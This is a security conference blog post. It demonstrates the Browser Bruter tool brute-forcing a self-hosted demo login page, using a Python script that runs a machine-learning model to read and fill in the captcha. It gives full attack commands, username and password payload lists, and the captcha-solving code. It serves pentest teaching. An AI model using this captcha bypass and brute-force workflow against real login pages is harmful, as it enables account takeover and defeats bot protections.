NSConclave

  • Home
  • About
  • Workshops
  • Chakravyuh
  • Tickets
  • Speakers
  • Venue
  • Previous edition
    NSConclave 2020 NSConclave 2023
  • Brute Goat
    Blog



Cracking The Captchas using Browser Bruter and Python

altImage [Image Generated using AI Tools]

By Jafar Pathan

Without a doubt, captchas are one of the most critical security component of the web application to prevent automated bots interacting with the application.

But they are annoying during pentest and bug bounty engagements as well.

Thanks to the Browser Bruter's Python Scripting Engine, we can bypass such captchas using Machine Learning.

So buckle up as today I am going to demonstrate how you can bypass such captchas by utilizing the powerful Python Scripting Engine of the Browser Bruter.

Note: resources shown in this blog are all available within the 'res' directory of the Browser Bruter.

Setting up the Target Web Application

Let's first analyze our target, for the demonstration purpose, I have developed a sample page with captcha logic as shown in image below -

alt text

To follow along, you can start this sample page by navigating to the 'BrowserBruter/res/samples/captcha/' and running following command -

python3 captcha.py

If you got following error -

ModuleNotFoundError: No module named 'captcha'

just run following command -

pip3 install captcha

and while running above command, you got error like following -

error: externally-managed-environment

run the following command -

pip3 install captcha --break-system-packages

and you are good to go, you will expect output like following -

alt text

Now navigate to http://127.0.0.1:5000 and you should see the sample web page as shown in image above.

Let's analyze the target web application.

alt text

This is basic login form with added captcha to prevent automated attacks.

It has three input fields,

  1. Username
  2. Password
  3. Captcha
Note: As this is for demonstration purpose, the password and username for the web application is admin:admin, and successful login will return welcome response.

Take 1: Fuzzing Without Captcha Bypass

Let's run the Browser Bruter Brute Force attack against this and analyze the behavior of attack.

To perform the BruteForce attack, I have prepared following payload lists:

  1. usernames.txt:

    portaladmin
    admin@gmail.com
    guest
    admin
    email@123.com
    
  2. passwords.txt:

    1234
    super_strong_password
    qesdgs6e56
    wqwer
    password
    123123123
    admin
    

First let's build up the required options to run the attack.

  1. --target: This will be 'http://127.0.0.1:5000/'
  2. --attack: As we are going to run brute force attack, we will use attack mode 4
  3. --elements-payloads: I have found the id of the elements which are as follows - 'username', 'password' respectively. So the option will be `--elements-payloads username:usernames.txt,password:passwords.txt
  4. --button: I have found the name of the 'login' button which is 'submit' making our command --button submit
  5. --fill: As the application requires captcha field too, for now we will use --fill option to fill it with random value. I have found it's id as 'captcha_input'.

So our final command will be as follows:

python3 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --fill captcha_input

Now let's run this and see the result:

alt text

alt text

Attack has been finished and report has been generated. Let's open this report in ReportExplorer.py

alt text

alt text

There's a lots of traffic, it's impossible to analyze each and every request one by one to see if we got the successful response.

To make things easier, thanks to the rich features of Browser Bruter, we can use --grep option of ReportExlorer to with "welcome" keyword to search this along the HTTP traffic, because 'welcome', 'hello', 'success', 'admin' are common keywords appear in successful response of login page.

I will run following command for this:

python3 ReportExplorer.py --report </path/to/report.csv> --grep welcome

alt text

Well, our attack has been failed, and we know the reason, it's because of captcha. Even though we had provided valid credentials, we were unsuccessful in bruteforcing the login page.

Now, to bruteforce this login, we have to first bypass the captcha. Let's jump to it.

Take 2: Bypassing the Captcha

I have prepared and trained a ML model to crack this captcha, How do I trained it? well that's a story for some another time.

Today, we will integrate this Machine Learning model into Browser Bruter to extend it's functionality to bypass this captcha.

To achieve this I have written following short python script -

import os
import random
import cv2
import string
from PIL import Image, ImageDraw, ImageFont
from captcha.image import ImageCaptcha
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, models
from tensorflow.keras.utils import to_categorical
import requests

# Function to preprocess and predict text from a sample captcha
def predict_captcha(model, sample_captcha_path, label_to_int):
    # Load and preprocess the sample PNG captcha
    sample_captcha = cv2.imread(sample_captcha_path, cv2.IMREAD_GRAYSCALE)

    sample_captcha = cv2.resize(sample_captcha, (28 * 4, 28))

    # Chop the sample captcha into four characters
    character_width = 28
    characters = [sample_captcha[:, i:i + character_width] for i in range(0, sample_captcha.shape[1], character_width)]

    # Preprocess each character and make predictions
    predicted_text = ""
    for char_image in characters:
        char_image = char_image.reshape((1, 28, 28, 1)).astype("float32") / 255.0
        predictions = model.predict(char_image)
        predicted_label_idx = np.argmax(predictions)
        predicted_label = list(label_to_int.keys())[list(label_to_int.values()).index(predicted_label_idx)]
        predicted_text += predicted_label

    return predicted_text

# Map labels to integers
label_to_int = {char: idx for idx, char in enumerate(string.ascii_letters + string.digits)}
num_classes = len(label_to_int)

# Load the saved model
model = tf.keras.models.load_model("res/samples/captcha_model.keras") # Change Here, Please provide correct path of the model
# Re-compile the model to ensure metrics are set
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])

image_element = driver.find_element(By.ID, "captcha_image")
img_url = image_element.get_attribute('src')

response = requests.get(img_url)
with open('image.png', 'wb') as file:
    file.write(response.content)

# Example usage of the prediction function
#sample_captcha_path = "sample.png"  # Change this to the path of your sample captcha
predicted_text = predict_captcha(model, 'image.png', label_to_int)
print("Predicted Text:", predicted_text)

image_input_element = driver.find_element(By.ID, "captcha_input")

image_input_element.clear()
image_input_element.send_keys(predicted_text)

Below is the summary of what the above script is doing:

  • It imports libraries for image processing (cv2, PIL), machine learning (TensorFlow), and web automation

  • The main function predict_captcha processes and recognizes text from CAPTCHA images:

  • Takes a CAPTCHA image as input Converts it to grayscale and resizes it Splits the image into individual characters Uses a neural network model to predict each character

  • Combines the character predictions into the complete CAPTCHA text

  • The code creates a mapping between ASCII letters/digits and integers using label_to_int

  • It loads a pre-trained Keras model from "res/samples/captcha_model.keras"

  • The script finds a CAPTCHA image on a webpage using Selenium's driver.find_element

  • It downloads the CAPTCHA image from the extracted URL

  • After prediction, it:

    • Locates the input field for the CAPTCHA solution
    • Clears any existing text
    • Enters the predicted CAPTCHA text

Above script requires several python packages to be installed, to install them run pip3 install -r res/samples/requirements-for-ml-sample.txt

Now, that we are done with our script. Let's import this script into Browser Bruter. We can achieve this using --python-file option provided by Browser Bruter as way to interact with Python Scripting Engine.

So our command will be as follows:

python3.12 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --python-file res/samples/bb-predict.py --print-error

I have made following changes in our original command:

  • I have removed the --fill option because as we will enter the correct captcha in captcha_input using Machine Learning Model.
  • I have added --print-error option because I want to see if there are any issues with my python script or not.

Now, let's run this bad boy,

alt text

alt text

Yeah, it's working, we are able to bypass the captcha by integrating Machine Learning into Browser Bruter.

Let's for wait the attack to finish.

alt text

It's done, let me analyze the result

alt text

And here it is, we found the credential and successfully bypassed the captcha.

So, this is how you can leverage Python Scripting Enginer of Browser Bruter to do all kinds of crazy stuff and fuzz the unfuzzable.

Keep fuzzing! Keep Hacking!


Contact

If you have any questions, suggestions, or feedback, feel free to connect with me on:

Github: https://github.com/zinja-coder

LinkedIn: https://www.linkedin.com/in/jafar-pathan/

Twitter: https://x.com/zinja_coder

About: https://zinja-coder.github.io/

Threads: jafar.khan.pathan_

Secure your passes now!

Useful Links

  • Home
  • About
  • Workshops
  • Chakravyuh

Useful Links

  • Tickets
  • Speakers
  • Schedule
  • Venue

Contact Us

1, Sanjiv Baug,
Nr. Parimal Crossing,
Paldi,
Ahmedabad - 380007
Phone: +91 - 7926 6500 90
Email: conclave@net-square.com

© Copyright 2024 Net Square Solutions Pvt. Ltd. All Rights Reserved
  • Home
  • About
  • Workshops
  • Chakravyuh
  • Tickets
  • Speakers
  • Venue
  • Previous edition
    NSConclave 2020 NSConclave 2023
  • Brute Goat
    Blog